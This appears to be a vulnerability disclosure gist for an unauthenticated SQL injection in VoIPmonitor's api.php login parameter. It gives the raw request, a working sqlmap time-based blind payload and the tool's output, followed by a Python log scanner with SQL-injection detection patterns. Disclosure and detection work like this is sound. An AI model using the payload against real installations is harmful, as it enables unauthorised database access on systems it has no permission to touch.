@divinepwner
Created April 28, 2021 19:33
voipmonitor unauth sql injection

SQL injection in the user parameter. Since the api.php file doesn't require any authentication, an attacker can exploit this vulnerability without a valid session or credentials.

GET /voipmonitorpath/api.php?action=login&user=[inject_here]&pass=trollz HTTP/1.1
Host: vulnerableinstance
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 0
Connection: close

sqlmap result:

Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: http://vulnerableinstance:80/voipmonitorpath/api.php?action=login&user=' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))Evax) AND 'jvDj'='jvDj&pass=trollz
---
[02:19:33] [INFO] testing MySQL
[02:20:22] [INFO] confirming MySQL
web application technology: Nginx 1.14.2, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.3.29-MariaDB-1:10.3.29+maria~stretch'

cc: @cnbrkbolat & @R0h1rr1m
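
A defender-side check for the request pattern above, as an added example (not part of the original gist or of VoIPmonitor's code): it scans access log lines for `api.php?action=login` requests whose decoded `user` value contains SQL metacharacters or keywords. The combined log format, the sample lines and the function name `suspicious_login_users` are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD URI PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Tokens that do not belong in a login name but show up in SQL injection
# probes, including the time-based SLEEP() payload in the sqlmap output.
SUSPICIOUS_RE = re.compile(
    r"""['"`;]|--|/\*|\b(?:sleep|benchmark|union|select)\b""", re.IGNORECASE
)

def suspicious_login_users(log_lines):
    """Return (line_number, decoded_user) for flagged api.php login requests.

    Only query-string parameters are visible in an access log; parameters
    sent in a POST body are not recorded there.
    """
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/api.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes
        if "login" not in params.get("action", []):
            continue
        for user in params.get("user", []):
            if SUSPICIOUS_RE.search(user):
                hits.append((number, user))
    return hits

# Constructed sample lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2021:10:00:00 +0000] "GET /voipmonitorpath/api.php'
    '?action=login&user=alice&pass=x HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.9 - - [01/Jan/2021:10:00:05 +0000] "GET /voipmonitorpath/api.php'
    '?action=login&user=%27%20AND%20(SELECT%209158%20FROM%20(SELECT(SLEEP(5)))Evax)'
    '%20AND%20%27jvDj%27=%27jvDj&pass=trollz HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [01/Jan/2021:10:00:09 +0000] "GET /voipmonitorpath/index.php'
    '?action=login&user=%27 HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for number, user in suspicious_login_users(SAMPLE_LOG):
        print(f"line {number}: suspicious user value {user!r}")
```

Legitimate login names containing an apostrophe will also be flagged, so treat hits as leads to correlate with response times and source addresses rather than as confirmed exploitation.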

@divinepwner

website of the product:

https://www.voipmonitor.org/
